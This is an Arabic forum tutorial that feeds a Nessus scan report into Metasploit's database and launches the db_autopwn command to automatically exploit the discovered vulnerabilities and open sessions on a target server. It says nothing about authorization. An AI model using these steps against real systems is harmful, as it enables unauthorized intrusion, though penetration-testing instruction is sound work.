أهلا و سهلا بكافّة الإخوة الأعضاء و الزوّآر في منتديات VBSPIDER
ندعوكم لمتابعة هذاا الموضوع الجديد إن شاء الله تعـالى ..
ن
كمل درس سابق في nessus لكن مع استغلاله في هجوم autopwn معروف في metasploit
[COLOR="rgb(0, 100, 0)"]إن شاء الله يعجبكم شرح [/COLOR]
===============================================
أولاً نبدأ على بركة الله بنقطة وهي يجب تسجيل تقرير الفحص بعد كل فحص وطريقة كتالي
كود PHP:
Export > name_of_fichier.nbe
أو ستجد عند ضغط على فحص عند مايكمل
كود PHP:
Download > name.nessus
ثم الأن سنتنقل لكيفية إستغلال هذا تقرير مع metasploit
أولاً نفتح msfconsole
كود PHP:
root@bt4:/pentest/exploits/framework3# ./msfconsole
ثم نضغط تالي :
كود PHP:
msf > load db_tracker
نحن أن عملنا قاعدة بيانات الأن سنضغط على help لنرى options موجودة
كود PHP:
msf > help.
Database Backend Commands
=========================
Command Description
------- -----------
db_add_host Add one or more hosts to the database
db_add_note Add a note to host
db_add_port Add a port to host
db_autopwn Automatically exploit everything
db_connect Connect to an existing database
db_create Create a brand new database
db_del_host Delete one or more hosts from the database
db_del_port Delete one port from the database
db_destroy Drop an existing database
db_disconnect Disconnect from the current database instance
db_driver Specify a database driver
db_hosts List all hosts in the database
db_import_amap_mlog Import a THC-Amap scan results file (-o -m)
db_import_nessus_nbe Import a Nessus scan result file (NBE)
db_import_nessus_xml Import a Nessus scan result file (NESSUS)
db_import_nmap_xml Import a Nmap scan results file (-oX)
db_nmap Executes nmap and records the output automatically
db_notes List all notes in the database
db_services List all services in the database
db_vulns List all vulnerabilities in the database
msf >
أن لنذهب ونأتي بتقرير nessus *.nbe ثم نضغط على db_hosts لإظهار هدف الذي عملنا له فحص
كود PHP:
msf > db_import_nessus_nbe /root/namefile.nbe
msf > db_hosts[*] Time: date Host: ip Status: alive OS:
أن نضغط أمر تالي لإظهار خدمات شغالة في سرفير هدف
كود PHP:
msf > db_services
وأن نظهر ثغرات التي وجدت في سرفير من خلال nessus بالأمر تالي
وأخيراً ننفذ هجومنا autopwn واللذي سيعمل على ثغرات اللتي وجدت من خلال nessus
كود PHP:
msf > db_autopwn -x -e
ثم نضغط على لنرى هل حصلنا على إتصل أو لا
كود PHP:
msf > sessions -l
اتمنى أن الموضوع أعجبكم
أخوكم HeaDShoT من تونس